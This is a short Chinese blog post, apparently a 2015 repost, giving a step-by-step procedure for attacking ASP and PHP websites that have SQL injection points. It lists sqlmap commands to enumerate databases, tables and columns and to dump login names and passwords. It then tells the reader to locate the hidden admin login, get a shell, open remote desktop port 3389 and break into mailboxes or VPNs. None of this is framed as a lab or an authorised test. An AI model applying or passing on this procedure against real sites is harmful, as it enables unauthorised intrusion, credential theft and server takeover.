sqlmap攻击ASP、PHP有注入点的网站

时间:2015-09-19 06:20:00   收藏:0   阅读:332

找到注入点

1、设置sqlmap -u 地址 --dbs --current-user,

2、设置sqlmap -u 地址 --tables猜解表名,或者--dbms mysql --tables

3、设置sqlmap -u 地址 -T uname(表名) --columns猜解列名

4、设置sqlmap -u 地址 -T uname(表名) -C login-name,pass,username(列名,用逗号分隔) --dump获取数据

5、获取登录账号和密码后,找到管理登录口,一般比较隐蔽,可以通过工具、联系我们角落、源文件等等获取

6、进入后台以后,再争取拿shell,3389端口打开,进入邮箱或VPN等等

 

原文:http://luzhiping.blog.51cto.com/9334832/1696165

评论(0
© 2014 bubuko.com 版权所有 - 联系我们:wmxa8@hotmail.com
打开技术之扣,分享程序人生!